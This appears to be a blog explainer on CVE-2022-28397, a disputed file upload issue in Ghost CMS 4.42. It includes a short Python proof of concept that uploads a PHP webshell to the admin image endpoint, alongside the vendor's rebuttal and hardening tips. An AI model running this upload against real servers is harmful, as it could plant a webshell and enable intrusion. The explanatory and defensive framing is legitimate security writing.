CVE-2022-28397 - **DISPUTED** Arbitrary File Upload in Ghost CMS v4.42.—What You Need to Know

---

Overview

A security advisory surfaced about CVE-2022-28397, which raises concerns about an arbitrary file upload vulnerability in the well-known Ghost CMS—specifically version 4.42.. According to the report, an attacker with access to the "file upload" module could potentially upload a malicious file and perform code execution, effectively compromising the server.

But, and it’s a big BUT: Ghost’s team disputes this claim, asserting that _only authenticated and trusted users can upload files_, and this is intentional by design. Let’s dig into the details of the alleged vulnerability, see a demo exploit, and settle into why the vendor says, "Don’t call it a bug."

What’s the Alleged Vulnerability?

According to the original advisory on GitHub, the vulnerability stems from a lack of proper checks during file upload. Basically, the attacker uploads a crafted file through the admin interface, and Ghost will accept it, potentially allowing remote code execution (RCE).

Code Snippet: Proof-of-Concept (PoC)

> Disclaimer: _This is for educational purposes only. Do not attempt without explicit permission._

Here's a Python code snippet using requests to upload a malicious file to a Ghost instance

import requests

# GHOST CMS URL
url = "http://your-ghost-cms.com/ghost/api/admin/images/upload/";

# YOUR SESSION TOKEN (replace after logging in via browser/devtools)
headers = {
    'Authorization': 'Ghost <your_session_token>'
}

# Malicious file (example: PHP webshell)
files = {
    'file': ('shell.php', open('shell.php', 'rb'), 'application/octet-stream')
}

response = requests.post(url, headers=headers, files=files)
print("Status Code:", response.status_code)
print("Response:", response.text)

Important: By default, Ghost's uploads are stored in /content/images/ and not processed as executable code on most webserver configs, so RCE is unlikely unless you misconfigure your server.

Vendor's Standpoint

The Ghost Foundation Team strongly disputes CVE-2022-28397’s threat, referencing their security docs and official statement:

> As detailed in Ghost's security documentation, files are only uploaded and published by trusted users. The system does not allow anonymous or untrusted users to upload. This is intentional functionality.

TL;DR:

The researcher's PoC only works if you already have admin access (not a privilege escalation).

- Under normal setups, even if you upload a .php file, Ghost stores it in a way that the server never "runs" the code—it treats it as a download, not executable code.
- If your server is misconfigured (i.e., runs code from /content/images/), that's not Ghost's fault.

Short answer: Probably not.

- If you don't give random people admin/editor/author access, you're safe.
- As a good practice, never allow uploads of executable files and keep your webserver configurations tight.

Key Takeaways

- CVE-2022-28397 is disputed—This “vulnerability” can’t be exploited by outsiders, only by trusted users, and only under weird server misconfigurations.

Never give CMS backend access to untrusted individuals.

- Check your web server: Make sure it only executes files from expected directories (e.g., /public), not uploads.

References and Further Reading

- GitHub CVE-2022-28397 issue log
- Offical Ghost Security Overview
- Vendor statement on GitHub
- Ghost source code
- Example Media Upload API Docs

Final Words

CVE-2022-28397 is a good reminder to never trust user uploads and always validate both application permissions and server behavior. Ghost CMS is designed to be safe, _as long as best practices are followed_.

Stay secure, keep learning, and always RTFM (read the fine manual)!

Timeline

Published on: 04/12/2022 17:15:00 UTC
Last modified on: 06/13/2022 18:15:00 UTC